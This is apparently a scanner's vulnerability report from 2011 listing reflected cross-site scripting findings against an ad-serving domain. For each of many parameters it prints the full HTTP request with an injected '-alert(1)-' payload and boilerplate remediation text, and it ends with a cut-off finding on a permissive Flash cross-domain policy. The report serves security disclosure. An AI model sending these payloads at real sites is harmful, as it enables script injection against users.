This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100f1f9e'-alert(1)-'0465d79ff56&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a3e0"-alert(1)-"5023a527418 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1002a3e0"-alert(1)-"5023a527418&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94289"-alert(1)-"5ac4cc0ee2e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=94289"-alert(1)-"5ac4cc0ee2e&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f401e'-alert(1)-'2aa691d1759 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=f401e'-alert(1)-'2aa691d1759&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1952a"-alert(1)-"e57edee6b47 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24041952a"-alert(1)-"e57edee6b47&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4c60'-alert(1)-'749bfe725fb was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404c4c60'-alert(1)-'749bfe725fb&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61cd2'-alert(1)-'008e0c83e0e was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24361cd2'-alert(1)-'008e0c83e0e&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87d46"-alert(1)-"5f469ade8f7 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24387d46"-alert(1)-"5f469ade8f7&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 673bf"-alert(1)-"48b0cfefd7e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9673bf"-alert(1)-"48b0cfefd7e&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea231'-alert(1)-'1e9e5057b03 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9ea231'-alert(1)-'1e9e5057b03&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98fa2"-alert(1)-"506730e0e55 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=50394198fa2"-alert(1)-"506730e0e55&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f35'-alert(1)-'e637fd23aec was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=50394180f35'-alert(1)-'e637fd23aec&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2edb5"-alert(1)-"b77c08485d3 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=232edb5"-alert(1)-"b77c08485d3&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11d41'-alert(1)-'e747be08079 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=2311d41'-alert(1)-'e747be08079&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9669b"-alert(1)-"9139c319cc was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=101399669b"-alert(1)-"9139c319cc&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b14c'-alert(1)-'e00b177ebcb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=101396b14c'-alert(1)-'e00b177ebcb&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2244'-alert(1)-'6dd62e263af was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36b2244'-alert(1)-'6dd62e263af&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b45c"-alert(1)-"c4ba360ac47 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.367b45c"-alert(1)-"c4ba360ac47&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
